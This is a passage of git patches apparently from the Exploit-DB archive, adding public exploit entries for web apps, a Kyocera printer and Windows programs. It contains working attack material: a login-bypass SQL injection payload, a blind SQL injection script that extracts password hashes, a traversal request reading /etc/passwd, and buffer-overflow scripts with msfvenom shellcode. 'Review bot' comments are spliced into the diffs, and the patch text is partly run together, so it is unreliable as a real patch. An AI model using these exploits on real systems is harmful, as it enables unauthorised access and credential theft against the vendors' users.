+48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
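Review bot: The "About" paragraph states that the unquoted path "allows a user to gain SYSTEM privileges", but the precondition that decides whether this is exploitable only appears at step 7: write access to `C:\Program Files (x86)\IObit`. The entry shows no ACL evidence for that directory (for example `icacls` output), so whether a standard user has that access on a default install is not established here; the introduction should state the precondition and the evidence for it. A remediation line is also missing; the fix is to quote the service image path, e.g. `sc config IObitUnSvr binPath= "\"C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe\""`.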
@@ -42768,3 +42769,19 @@ id,file,description,date,author,type,platform,port 48536,exploits/php/webapps/48536.py,"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution",2020-06-01,s1gh,webapps,php, 48538,exploits/php/webapps/48538.txt,"Clinic Management System 1.0 - Authentication Bypass",2020-06-02,BKpatron,webapps,php, 48539,exploits/php/webapps/48539.txt,"OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated)",2020-06-02,"Kailash Bohara",webapps,php, +48541,exploits/hardware/webapps/48541.py,"AirControl 1.4.2 - PreAuth Remote Code Execution",2020-06-04,0xd0ff9,webapps,hardware, +48542,exploits/php/webapps/48542.txt,"Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)",2020-06-04,Enesdex,webapps,php, +48544,exploits/php/webapps/48544.txt,"Clinic Management System 1.0 - Unauthenticated Remote Code Execution",2020-06-04,BKpatron,webapps,php, +48545,exploits/php/webapps/48545.py,"Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated)",2020-06-04,"Gus Ralph",webapps,php, +48546,exploits/php/webapps/48546.txt,"Oriol Espinal CMS 1.0 - 'id' SQL Injection",2020-06-04,TSAR,webapps,php, +48547,exploits/php/webapps/48547.txt,"Clinic Management System 1.0 - Authenticated Arbitrary File Upload",2020-06-04,BKpatron,webapps,php, +48548,exploits/php/webapps/48548.txt,"Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin)",2020-06-04,"Gus Ralph",webapps,php, +48549,exploits/java/webapps/48549.py,"VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-04,"Tomas Melicher",webapps,java, +48550,exploits/php/webapps/48550.txt,"Navigate CMS 2.8.7 - Authenticated Directory Traversal",2020-06-04,"Gus Ralph",webapps,php, +48551,exploits/hardware/webapps/48551.txt,"D-Link DIR-615 T1 20.10 - CAPTCHA Bypass",2020-06-04,"huzaifa hussain",webapps,hardware, +48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution",2020-06-04,Enesdex,webapps,php, +48553,exploits/multiple/webapps/48553.txt,"Cayin 
Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple, +48554,exploits/hardware/webapps/48554.txt,"SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)",2020-06-04,LiquidWorm,webapps,hardware, +48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware, +48557,exploits/multiple/webapps/48557.py,"Cayin Signage Media Player 3.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple, +48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple, From d0531a5e12527acac56c8c13c4b2fbe056850322 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 6 Jun 2020 05:01:55 +0000 Subject: [PATCH 08/17] DB: 2020-06-06 2 changes to exploits/shellcodes Online Course Registration 1.0 - Authentication Bypass Online-Exam-System 2015 - 'feedback' SQL Injection --- exploits/php/webapps/48559.txt | 40 ++++++++++++++++++++++++++++++++++ exploits/php/webapps/48560.py | 34 +++++++++++++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 76 insertions(+) create mode 100644 exploits/php/webapps/48559.txt create mode 100755 exploits/php/webapps/48560.py diff --git a/exploits/php/webapps/48559.txt b/exploits/php/webapps/48559.txt new file mode 100644 index 000000000..1cac98d7f --- /dev/null +++ b/exploits/php/webapps/48559.txt 
@@ -0,0 +1,40 @@
+# Exploit Title: Online Course Registration 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-06-05
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : admin/index.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+
+http://localhost/Online%20Course%20Registration/admin/index.php
+
+POST /Online%20Course%20Registration/admin/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 61
+Referer: http://localhost/Online%20Course%20Registration/admin/index.php
+Cookie: PHPSESSID=il6a0lzq8ndo1bb4672rd7cr3m
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined
+
+HTTP/1.1 302 Found
+Date: Thu, 04 Jun 2020 20:04:27 GMT
+Server: Apache/2.4.39 (Win64) PHP/7.3.5
+X-Powered-By: PHP/7.3.5
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+location: http://localhost/Online Course Registration/admin/change-password.php
\ No newline at end of file
diff --git a/exploits/php/webapps/48560.py b/exploits/php/webapps/48560.py
new file mode 100755
index 000000000..7e9fce954
--- /dev/null
+++ b/exploits/php/webapps/48560.py
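Review bot: The `# Vulnerability:` line names the effect (login bypass) but not the cause, which is what a maintainer needs in order to fix it. The payload `'=''or'` sent in both `username` and `password` suggests that the login query in `admin/index.php` is built by string concatenation, i.e. SQL injection, though the vulnerable code is not shown in the entry. State that explicitly and add a remediation line such as `# Fix: use prepared statements for the login query in admin/index.php`.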
@@ -0,0 +1,34 @@ +# Exploit Title: Online-Exam-System 2015 - 'feedback' SQL Injection +# Date: 2020-06-04 +# Exploit Author: Gus Ralph +# Vendor Homepage: https://github.com/sunnygkp10/ +# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git +# Affected Version: 2015 +# Tested on: Ubuntu +# CVE : N/A + +import requests, string, time +from sys import stdout + +URL = raw_input("Please enter the URL to attack (example http://localhost/Online-Exam-System/)\n") + +payload = "feedback' , '2020-06-04', '01:58:10am'),('1337','test','test@test.com','test',(SELECT CASE WHEN (SELECT EXISTS(SELECT password FROM user WHERE password REGEXP BINARY '^" +payload2 = ".*'))=1 THEN sleep(5) ELSE sleep(0) END),'2020-06-04', '01:58:10am'); -- -" +so_far = hash = "" +while True: + for i in string.digits + string.ascii_lowercase: + so_far = hash + i + payload_to_send = payload + str(so_far) + payload2 + data = {"name":"test","email":"test@test.com","subject":"test","feedback":payload_to_send} + start = time.time() + r = requests.post(URL + "feed.php", data = data) + request_time = time.time() - start + if request_time > 5: + hash += i + stdout.write(i) + stdout.flush() + break + if len(hash) > 31: + stdout.write("\n") + print "Hash found: " + hash + break \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ca945761d..1cf93bd8b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
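Review bot: Every probe this script sends appears to write to the database, and the header does not document that side effect: the payload closes one `VALUES` tuple and appends a second one (`('1337','test','test@test.com','test',...`), so, assuming `feed.php` runs an INSERT as the payload shape implies, a full run leaves many junk feedback rows behind. Add a header line such as `# Note: each request inserts rows into the feedback table; clean up after testing`. The same property is the detection point for defenders: bursts of POSTs to `feed.php` whose `feedback` field contains `REGEXP BINARY` or `sleep(`, and stored rows whose first column is `1337`. The script is also Python 2 only (`raw_input`, `print` statement) and does not say so.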
@@ -42785,3 +42785,5 @@ id,file,description,date,author,type,platform,port 48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware, 48557,exploits/multiple/webapps/48557.py,"Cayin Signage Media Player 3.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple, 48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple, +48559,exploits/php/webapps/48559.txt,"Online Course Registration 1.0 - Authentication Bypass",2020-06-05,BKpatron,webapps,php, +48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php, From 590364ca2a0a3e3251b312f456260d3781fc13db Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 9 Jun 2020 05:02:04 +0000 Subject: [PATCH 09/17] DB: 2020-06-09 4 changes to exploits/shellcodes Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC) Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH) Kyocera Printer d-COPIA253MF - Directory Traversal (PoC) Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection --- exploits/hardware/webapps/48561.txt | 68 ++++++++++++++++++++++ exploits/php/webapps/48562.txt | 23 ++++++++ exploits/windows/local/48563.py | 70 ++++++++++++++++++++++ exploits/windows/local/48564.py | 90 +++++++++++++++++++++++++++++ files_exploits.csv | 4 ++ 5 files changed, 255 insertions(+) create mode 100644 exploits/hardware/webapps/48561.txt create mode 100644 exploits/php/webapps/48562.txt create mode 100755 exploits/windows/local/48563.py create mode 100755 exploits/windows/local/48564.py diff --git a/exploits/hardware/webapps/48561.txt b/exploits/hardware/webapps/48561.txt new file mode 100644 index 000000000..b053e1597 --- /dev/null +++ b/exploits/hardware/webapps/48561.txt 
@@ -0,0 +1,68 @@ +# Exploit Title : Kyocera Printer d-COPIA253MF - Directory Traversal (PoC) +# Exploit Author: Hakan Eren ŞAN +# Date: 2020-06-06 +# Vendor Homepage: https://www.kyoceradocumentsolutions.com.tr/tr.html +# Version: d-COPIA253MF plus +# Tested on : Linux +# Credit: Berat Isler + + +# First step , you can capture the main page +# Then create a directory traveral payload like ../../../ this +# Then you add nullbyte to the end of the payload(%00) +# Last step sent your request + +This is the code : + +Request: + + +GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1 +Host: X.X.X.X +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) +Gecko/20100101 Firefox/76.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: rtl=0 +Upgrade-Insecure-Requests: 1 +If-None-Match: "/wlmeng/index.htm, Thu, 04 Jun 2020 13:41:16 GMT" +Cache-Control: max-age=0 + + +Response: + +HTTP/1.1 200 OK +Content-Length: 843 +Date: Thu, 04 Jun 2020 16:09:54 GMT +Server: KM-MFP-http/V0.0.1 +Last-Modified: Thu, 04 Jun 2020 13:41:16 GMT +ETag: "/wlmeng/../../../../../../../../../../../etc/passwd, Thu, 04 Jun +2020 13:41:16 GMT" +Content-Type: text/html + +root::0:0:root:/root:/bin/sh +bin:*:1:1:bin:/bin:/bin/sh +daemon:*:2:2:daemon:/usr/sbin:/bin/sh +sys:*:3:3:sys:/dev:/bin/sh +adm:*:4:4:adm:/var/adm:/bin/sh +lp:*:5:7:lp:/var/spool/lpd:/bin/sh +sync:*:6:8:sync:/bin:/bin/sync +shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown +halt:*:8:10:halt:/sbin:/sbin/halt +mail:*:9:11:mail:/var/mail:/bin/sh +news:*:10:12:news:/var/spool/news:/bin/sh +uucp:*:11:13:uucp:/var/spool/uucp:/bin/sh +operator:*:12:0:operator:/root:/bin/sh +games:*:13:60:games:/usr/games:/bin/sh +ftp:*:15:14:ftp:/var/ftp:/bin/sh +man:*:16:20:man:/var/cache/man:/bin/sh +www:*:17:18:www-data:/var/www:/bin/sh +sshd:*:18:19:sshd:/var/run/sshd:/bin/sh 
+proxy:*:19:21:proxy:/bin:/bin/sh +telnetd:*:20:22:proxy:/bin:/bin/sh +backup:*:34:34:backup:/var/backups:/bin/sh +ais:*:101:101:ais:/var/run/ais:/bin/sh +nobody:*:65534:65534:nobody:/nonexistent:/bin/sh \ No newline at end of file diff --git a/exploits/php/webapps/48562.txt b/exploits/php/webapps/48562.txt new file mode 100644 index 000000000..10c1394f9 --- /dev/null +++ b/exploits/php/webapps/48562.txt @@ -0,0 +1,23 @@ +# Exploit Title: Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection +# Date: 2020-06-07 +# Exploit Author: Pankaj Kumar Thakur +# Vendor Homepage: http://virtualairlinesmanager.net/ +# Dork: inurl:notam_id= +# Affected Version: 2.6.2 +# Tested on: Ubuntu +# CVE : N/A + +Vulnerable parameter +------------------- +notam_id=%27%27 + +Id parameter's value is going into sql query directly! + +Proof of concept +--------------- +https://localhost:8080/vam/index.php?page=notam¬am_id=11%27%27 + + +Submitted: Jun 1 2020 +Fixed: Jun 5 2020 +Acknowledgement : https://ibb.co/Y3WYdFN \ No newline at end of file diff --git a/exploits/windows/local/48563.py b/exploits/windows/local/48563.py new file mode 100755 index 000000000..4aad4c2a0 --- /dev/null +++ b/exploits/windows/local/48563.py 
@@ -0,0 +1,70 @@ +# Exploit Title: Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC) +# Vendor Homepage: http://www.frigate3.com/ +# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe +# Exploit Author: Paras Bhatia +# Discovery Date: 2020-06-07 +# Vulnerable Software: Frigate +# Version: <= 3.36.0.9 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) + +#Steps to Produce the Crash: + +# 1.- Run python code: FrigateLCE.py +# 2.- Copy content to clipboard +# 3.- Turn off DEP for Frigate3.exe +# 4.- Open "Frigate3.exe" +# 5.- Go to "Command" > "Command Line" > "Activate Command Line" +# 6.- Paste ClipBoard into the "Command Line" field which appears at the bottom of the Frigate application. +# 7.- Press Enter from Keyboard. +# 7.- Click on OK in the dialog box that appears. +# 8.- Calc.exe runs. + + +################################################################################################################################################# + +#Python "FrigateLCE.py" Code: + +f= open("FrigateLCE.txt", "w") + +junk="A" * 4112 + +nseh="\xeb\x20\x90\x90" + +seh="\x4B\x0C\x01\x40" + +#40010C4B 5B POP EBX +#40010C4C 5D POP EBP +#40010C4D C3 RETN +#POP EBX ,POP EBP, RETN | [rtl60.bpl] (C:\Program Files\Frigate3\rtl60.bpl) + +nops="\x90" * 50 + +# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python + +buf = "" +buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b" +buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18" +buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f" +buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63" +buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5" +buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac" +buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee" +buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21" +buf 
+= "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc" +buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb" +buf += "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33" +buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae" +buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f" +buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10" +buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6" +buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1" +buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05" + + + + +payload = junk + nseh + seh + nops + buf + +f.write(payload) +f.close \ No newline at end of file diff --git a/exploits/windows/local/48564.py b/exploits/windows/local/48564.py new file mode 100755 index 000000000..14c4c2602 --- /dev/null +++ b/exploits/windows/local/48564.py 
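Review bot: Step 3 of the reproduction, `Turn off DEP for Frigate3.exe`, is a precondition that neither the title nor the header fields mention, so the entry overstates the impact on a hardened configuration: as written, code execution is demonstrated only with DEP disabled for the process. Put it in the header, e.g. `# Note: PoC requires DEP to be disabled for Frigate3.exe`. The reproduction steps also use the number `7.-` twice, which makes the step references ambiguous.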
@@ -0,0 +1,90 @@ +# Exploit Title: Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH) +# Date: 2020-06-05 +# Author: Felipe Winsnes +# Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html +# Version: 1.3 +# Tested on: Windows 7 + +# Proof of Concept: + +# 1.- Run the python script "poc.py", it will create a new file "poc.m3l" +# 2.- Open the application, +# 3.- Click on the bottom-right button with the letters "PL" +# 4.- Select the option "File" +# 5.- Click "Load List" +# 6.- Select poc.m3l +# 7.- Profit + +# Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Exploiting-Quick-Player/ +# Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings6/18.gif + +# msfvenom -p windows/messagebox TEXT=pwned! -e x86/unicode_mixed -f py EXITFUNC=thread BufferRegister=EAX +# Payload size: 640 bytes + +buf = b"" +buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" +buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" +buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" +buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" +buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" +buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" +buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" +buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" +buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" +buf += b"\x47\x42\x39\x75\x34\x4a\x42\x37\x69\x5a\x4b\x73\x6b" +buf += b"\x59\x49\x71\x64\x6f\x34\x69\x64\x70\x31\x4a\x32\x47" +buf += b"\x42\x61\x67\x6e\x51\x35\x79\x43\x34\x64\x4b\x62\x51" +buf += b"\x4c\x70\x64\x4b\x70\x76\x5a\x6c\x64\x4b\x74\x36\x4d" +buf += b"\x4c\x44\x4b\x51\x36\x4b\x58\x64\x4b\x71\x6e\x6d\x50" +buf += b"\x64\x4b\x4d\x66\x4e\x58\x70\x4f\x6b\x68\x31\x65\x4a" +buf += b"\x53\x62\x39\x49\x71\x78\x51\x79\x6f\x58\x61\x53\x30" +buf += b"\x42\x6b\x52\x4c\x6b\x74\x4f\x34\x52\x6b\x50\x45\x6d" +buf += 
b"\x6c\x72\x6b\x6e\x74\x4c\x68\x33\x48\x69\x71\x4a\x4a" +buf += b"\x52\x6b\x70\x4a\x6a\x78\x32\x6b\x31\x4a\x4d\x50\x6a" +buf += b"\x61\x6a\x4b\x79\x53\x6e\x54\x4e\x69\x44\x4b\x6f\x44" +buf += b"\x54\x4b\x6d\x31\x5a\x4e\x6d\x61\x39\x6f\x4e\x51\x69" +buf += b"\x30\x49\x6c\x46\x4c\x45\x34\x45\x70\x52\x54\x7a\x67" +buf += b"\x35\x71\x66\x6f\x5a\x6d\x49\x71\x77\x57\x58\x6b\x59" +buf += b"\x64\x4d\x6b\x73\x4c\x4d\x54\x6d\x58\x32\x55\x59\x51" +buf += b"\x34\x4b\x4f\x6a\x4b\x74\x4d\x31\x6a\x4b\x71\x56\x62" +buf += b"\x6b\x7a\x6c\x70\x4b\x34\x4b\x6e\x7a\x6d\x4c\x6b\x51" +buf += b"\x48\x6b\x62\x6b\x5a\x64\x44\x4b\x59\x71\x5a\x48\x52" +buf += b"\x69\x71\x34\x6d\x54\x4b\x6c\x71\x51\x46\x63\x37\x42" +buf += b"\x4c\x48\x6c\x69\x38\x54\x62\x69\x58\x65\x52\x69\x79" +buf += b"\x32\x72\x48\x44\x4e\x6e\x6e\x4c\x4e\x78\x6c\x32\x32" +buf += b"\x5a\x48\x45\x4f\x49\x6f\x49\x6f\x4b\x4f\x53\x59\x71" +buf += b"\x35\x69\x74\x77\x4b\x7a\x4f\x68\x4e\x49\x50\x51\x50" +buf += b"\x64\x47\x4b\x6c\x6c\x64\x31\x42\x49\x58\x52\x6e\x59" +buf += b"\x6f\x39\x6f\x49\x6f\x62\x69\x71\x35\x7a\x68\x33\x38" +buf += b"\x30\x6c\x52\x4c\x6b\x70\x4e\x61\x71\x58\x4d\x63\x50" +buf += b"\x32\x4e\x4e\x4f\x74\x52\x48\x71\x65\x34\x33\x32\x45" +buf += b"\x31\x62\x4e\x50\x77\x6b\x62\x68\x71\x4c\x4e\x44\x4a" +buf += b"\x6a\x52\x69\x6b\x36\x6e\x76\x79\x6f\x4f\x65\x6a\x64" +buf += b"\x55\x39\x35\x72\x72\x30\x65\x6b\x56\x48\x77\x32\x6e" +buf += b"\x6d\x75\x6c\x74\x47\x6d\x4c\x4f\x34\x62\x32\x5a\x48" +buf += b"\x51\x4f\x4b\x4f\x49\x6f\x39\x6f\x73\x38\x70\x6f\x71" +buf += b"\x68\x31\x48\x4b\x70\x53\x38\x50\x61\x4f\x77\x43\x35" +buf += b"\x71\x32\x51\x58\x30\x4d\x30\x65\x72\x53\x53\x43\x6e" +buf += b"\x51\x57\x6b\x63\x58\x6f\x6c\x6b\x74\x6a\x6a\x45\x39" +buf += b"\x39\x53\x62\x48\x71\x54\x4d\x51\x6e\x78\x6d\x50\x61" +buf += b"\x58\x70\x70\x31\x67\x32\x4e\x51\x55\x4d\x61\x69\x39" +buf += b"\x72\x68\x6e\x6c\x6d\x54\x4b\x56\x33\x59\x48\x61\x4e" +buf += b"\x51\x49\x42\x4f\x62\x30\x53\x4e\x71\x51\x42\x79\x6f" +buf += 
b"\x38\x50\x6e\x51\x75\x70\x32\x30\x69\x6f\x32\x35\x4c" +buf += b"\x48\x41\x41" + +alignment = "\x54\x71" # push esp, padding +alignment += "\x58\x71" # pop eax, padding +alignment += "\x05\x20\x22" # add eax, 0x22002000 +alignment += "\x71" # Padding +alignment += "\x2D\x19\x22" # sub eax, 0x22001900 +alignment += "\x71" # Padding +alignment += "\x50\x71" # push eax, padding +alignment += "\xC3" # retn + +ret = "\x71\x41" + "\xF2\x41" # 0x004100f2 : pop esi # pop ebx # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READWRITE} [Quick Player.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.3.0.0 (C:\Program Files\Quick Player\Quick Player.exe) + +buffer = "A" * 536 + ret + "\x41\x71\x41\x71" + alignment + "A" * 73 + buf + "A" * 200 +f = open ("poc.m3l", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1cf93bd8b..1a7e1ec38 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -11085,6 +11085,8 @@ id,file,description,date,author,type,platform,port
 48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows,
 48517,exploits/windows/local/48517.py,"StreamRipper32 2.6 - Buffer Overflow (PoC)",2020-05-26,"Andy Bowden",local,windows,
 48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows,
+48563,exploits/windows/local/48563.py,"Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)",2020-06-08,"Paras Bhatia",local,windows,
+48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42787,3 +42789,5 @@ id,file,description,date,author,type,platform,port
 48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple,
 48559,exploits/php/webapps/48559.txt,"Online Course Registration 1.0 - Authentication Bypass",2020-06-05,BKpatron,webapps,php,
 48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php,
+48561,exploits/hardware/webapps/48561.txt,"Kyocera Printer d-COPIA253MF - Directory Traversal (PoC)",2020-06-08,"Hakan Eren ŞAN",webapps,hardware,
+48562,exploits/php/webapps/48562.txt,"Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection",2020-06-08,"Pankaj Kumar Thakur",webapps,php,
From 809b91dc6fd22a233babb33fb8cd3fc7f88057a2 Mon Sep 17 00:00:00 2001
From: Offensive Security Date: Wed, 10 Jun 2020 05:02:06 +0000 Subject: [PATCH 10/17] DB: 2020-06-10 2 changes to exploits/shellcodes Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection Bludit 3.9.12 - Directory Traversal --- exploits/php/webapps/48567.txt | 64 ++++++++++++++++++ exploits/php/webapps/48568.py | 114 +++++++++++++++++++++++++++++++++ files_exploits.csv | 2 + 3 files changed, 180 insertions(+) create mode 100644 exploits/php/webapps/48567.txt create mode 100755 exploits/php/webapps/48568.py diff --git a/exploits/php/webapps/48567.txt b/exploits/php/webapps/48567.txt new file mode 100644 index 000000000..930f42f52 --- /dev/null +++ b/exploits/php/webapps/48567.txt 
@@ -0,0 +1,64 @@ +# Exploit Title: Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection +# Google Dork: N/A +# Date: 2020-06-08 +# Exploit Author: Kostadin Tonev +# Vendor Homepage: http://virtualairlinesmanager.net +# Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/ +# Version: 2.6.2 +# Tested on: Linux Mint +# CVE : N/A + +. . . . . . . . . + . + . . : . .. :. .___---------___. + . . . . :.:. _".^ .^ ^. '.. :"-_. . + . : . . .:../: . .^ :.:\. + . . :: +. :.:/: . . . . . .:\ + . : . . _ :::/: . ^ . . .:\ + .. . . . - : :.:./. . .:\ + . . . :..|: . . ^. .:| + . . : : ..|| . . . !:| + . . . . ::. ::\( . :)/ + . . : . : .:.|. ###### .#######::| + :.. . :- : .: ::|.####### ..########:| + . . . .. . .. :\ ######## :######## :/ + . .+ :: : -.:\ ######## . ########.:/ + . .+ . . . . :.:\. ####### #######..:/ + :: . . . . ::.:..:.\ . . ..:/ + . . . .. : -::::.\. | | . .:/ + . : . . .-:.":.::.\ ..:/ + . -. . . . .: .:::.:.\. .:/ +. . . : : ....::_:..:\ ___. :/ + . . . .:. .. . .: :.:.:\ :/ + + . . : . ::. :.:. .:.|\ .:/| + . + . . ...:: ..| --.:| +. . . . . . . ... :..:.."( ..)" + . . . : . .: ::/ . 
